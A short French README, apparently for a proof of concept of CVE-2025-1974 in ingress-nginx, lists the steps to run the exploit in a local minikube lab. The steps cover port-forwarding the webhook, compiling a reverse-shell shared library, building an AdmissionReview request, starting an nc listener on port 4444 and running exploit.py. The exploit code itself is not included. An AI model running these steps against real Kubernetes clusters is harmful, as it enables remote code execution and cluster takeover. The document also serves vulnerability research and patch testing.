
CVE-2025-1974 code PoC
Installez minikube pour le test local
minikube start --driver=docker
Configurez ingress-nginx-controller avec la commande suivante
kubectl apply -f ingress-nginx-controller.yml
Vérifiez que les Pods fonctionnent correctement
kubectl get pods -n ingress-nginx
kubectl describe <pod name> -n ingress-nginx
Redirigez les ports 80 et 8443 (webhook) des Pods vers les ports locaux 8888 et 1337 (la redirection des ports 80 et 8443 est nécessaire dans les deux cas)
kubectl port-forward -n ingress-nginx <pod name> 8888:80
kubectl port-forward -n ingress-nginx <pod name> 1337:8443
Modifiez l'IP et le port de connexion du shell inverse dans rev_shell.c
Compilez sous MacOS (arm64), adaptez la compilation à l'environnement de test
aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu
Convertissez en format AdmissionReview avec kube-review (json)
./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json
Préparez la connexion du shell inverse avec nc
nc -lv 4444
Modifiez l'hôte et le port de nginx et du webhook dans exploit.py, puis exécutez-le
python3 exploit.py
